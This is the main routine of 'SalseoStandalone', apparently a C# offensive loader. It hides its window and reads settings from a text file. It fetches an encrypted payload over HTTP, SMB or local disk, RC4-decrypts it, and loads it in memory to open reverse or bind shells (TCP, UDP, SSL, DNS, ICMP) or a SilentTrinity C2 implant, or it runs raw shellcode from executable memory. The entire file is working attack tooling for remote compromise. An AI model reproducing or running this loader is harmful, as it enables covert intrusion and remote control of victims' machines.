static void Main(string[] args) { IntPtr h = Process.GetCurrentProcess().MainWindowHandle; ShowWindow(h, 0); string banner = @" _____ ____ _ _____ ___ ___ / ___/ / || | / ___/ / _] / \ ( \_ | o || | ( \_ / [_ | | \__ || || |___\__ || _]| O | / \ || _ || / \ || [_ | | \ || | || \ || || | \___||__|__||_____|\___||_____| \___/ _ ___ ____ ___ ___ ____ | | / \ / || \ / _]| \ | | | || o || \ / [_ | D ) | |___ | O || || D || _]| / | || || _ || || [_ | \ | || || | || || || . \ |_____| \___/ |__|__||_____||_____||__|\_| "; Console.ForegroundColor = ConsoleColor.Green; Console.Write(banner); Console.ForegroundColor = ConsoleColor.White; Console.WriteLine(" By: CyberVaca@HackPlayers"); string ayuda = @" [+] Usage: [-] SalseoStandalone.exe [-] You need to have your mandanga.txt on the same folder! [-] Serve your payload as you want! SMB, HTTP, Locally... [-] Want a meterpreter shell? Create a raw payload with msfvenom, encrypt it with encrypterassembly.py and use shellcode function. [-] Mandanga.txt contents: [-] Reverse TCP/UDP/SSL [-] Reverse ICMP [-] Reverse DNS <password> <password> <password> <path_to_elmal.txt> <path_to_elmal.txt> <path_to_elmal.txt> reversetcp/udp/ssl reverseicmp reversedns <LHOST> <LHOST> <LHOST> <LPORT> <DNS Server> [-] Bind TCP [-] SilentTrinity [-] Shellcode <password> <password> <password> <path_to_elmal.txt> <path_to_elmal.txt> <path_to_payload.txt> bindtcp silenttrinity shellcode <LHOST> <URL_to_C2C> <LPORT> [+] Available Payloads: [-] ReverseTCP [-] ReverseDNS [-] ReverseSSL [-] Shellcode [-] ReverseUDP [-] ReverseICMP [-] BindTCP [-] SilentTrinity "; //################### Loader parameters and validation of the supplied arguments ################### //////////////////////STANDALONE VERSION string file_name = ".\\mandanga.txt"; string clave = ""; string Salseo_URL = ""; string funcion = ""; string DNSServer = ""; string URLSILENT = ""; string LHOST = ""; string LPORT = ""; if (System.IO.File.Exists(file_name) == true) { 
System.IO.StreamReader objReader; try { if (File.ReadLines(file_name).Count() < 3) { Console.WriteLine(ayuda); Environment.Exit(1); } objReader = new System.IO.StreamReader(file_name); clave = objReader.ReadLine(); //Pass. ALways present. Salseo_URL = objReader.ReadLine(); //elmal.txt or shellcode.txt. Always present. funcion = objReader.ReadLine().ToLower(); //Chosen function. Always present. Console.WriteLine("[+] Password: "******"shellcode") { Console.WriteLine("[+] Shellcode path: " + Salseo_URL); } else { Console.WriteLine("[+] Elmal.txt path: " + Salseo_URL); } Console.WriteLine("[+] Chosen Function: " + funcion); if (funcion == "shellcode") { } else if (funcion == "silenttrinity") { if (File.ReadLines(file_name).Count() < 4) { Console.WriteLine(ayuda); Environment.Exit(1); } URLSILENT = objReader.ReadLine(); //SilentTrinity URL. Console.WriteLine("[+] SilentTrinity URL: " + URLSILENT); } else if (funcion == "icmp") { if (File.ReadLines(file_name).Count() < 4) { Console.WriteLine(ayuda); Environment.Exit(1); } LHOST = objReader.ReadLine(); //SilentTrinity URL. Console.WriteLine("[+] SilentTrinity URL: " + LHOST); } else if (funcion == "serverdns") { //HOST + DNSserver for dns shells. if (File.ReadLines(file_name).Count() < 5) { Console.WriteLine(ayuda); Environment.Exit(1); } LHOST = objReader.ReadLine(); DNSServer = objReader.ReadLine(); Console.WriteLine("IP: " + LHOST); Console.WriteLine("Port: " + DNSServer); } else { //HOST + PORT for bind/reverse shells. 
if (File.ReadLines(file_name).Count() < 5) { Console.WriteLine(ayuda); Environment.Exit(1); } LHOST = objReader.ReadLine(); LPORT = objReader.ReadLine(); Console.WriteLine("IP: " + LHOST); Console.WriteLine("Port: " + LPORT); } objReader.Close(); } catch (System.NullReferenceException e) { Console.WriteLine(e); } } else { Console.WriteLine(ayuda); Console.WriteLine("[-] .\\mandanga.txt file does not exist."); Environment.Exit(1); } string Salseo_Encriptado = null; byte[] xKey = Encoding.ASCII.GetBytes(clave); Console.ForegroundColor = ConsoleColor.Gray; if (Salseo_URL.Substring(0, 4).ToLower() == "http") { Salseo_Encriptado = ClienteWeb.LeePayload(Salseo_URL); } if (Salseo_URL.Substring(0, 2).ToLower() == "\\\\") { Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(Salseo_URL); } if (Salseo_URL.Substring(0, 4).ToLower() != "http" && Salseo_URL.Substring(0, 2).ToLower() != "\\\\") { Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(Salseo_URL); } //############################################################# //####################### Loading dll ######################## //############################################################# string hexadecimal = Zipea.Descomprime(Salseo_Encriptado); byte[] Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal); byte[] Final_Payload = RC4.Decrypt(xKey, Final_Payload_encriptado); string clases = null; Assembly salsongo = null; if (funcion != "shellcode") { salsongo = Assembly.Load(Final_Payload); Console.WriteLine("[+] Cargando la salsa en memoria."); Console.WriteLine("[+] Namespace de Assembly : " + 
salsongo.GetName().Name); foreach (Type infoass in salsongo.GetTypes()) { var strclase = string.Format("{0}", infoass.Name); clases = strclase; } ; } //########################### Call to the SilentTrinity function ######################## if (funcion == "silenttrinity") { string[] argumentos = new string[] { URLSILENT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("lanza"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } //########################### Call to the reverse function ######################## if (funcion == "reversetcp") { string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversetcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reversessl") { string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversessl"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseudp") { string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseudp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reversedns") { string[] argumentos = new string[] { LHOST + " " + DNSServer }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversedns"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseicmp") { string[] argumentos = new string[] { LHOST + " " }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseicmp"); object myInstance = 
Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "bindtcp") { string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("bindtcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "shellcode") { byte[] sc = Final_Payload; IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE); System.Diagnostics.Debug.Assert(baseAddr != IntPtr.Zero, "Error: No se pudo asignar la memoria remota."); Console.WriteLine("[+] Intentando cargar Shellcode"); try { Marshal.Copy(sc, 0, baseAddr, sc.Length); ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate)); del(); } catch (Exception e) { Console.WriteLine(e.Message); } finally { VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE); } } }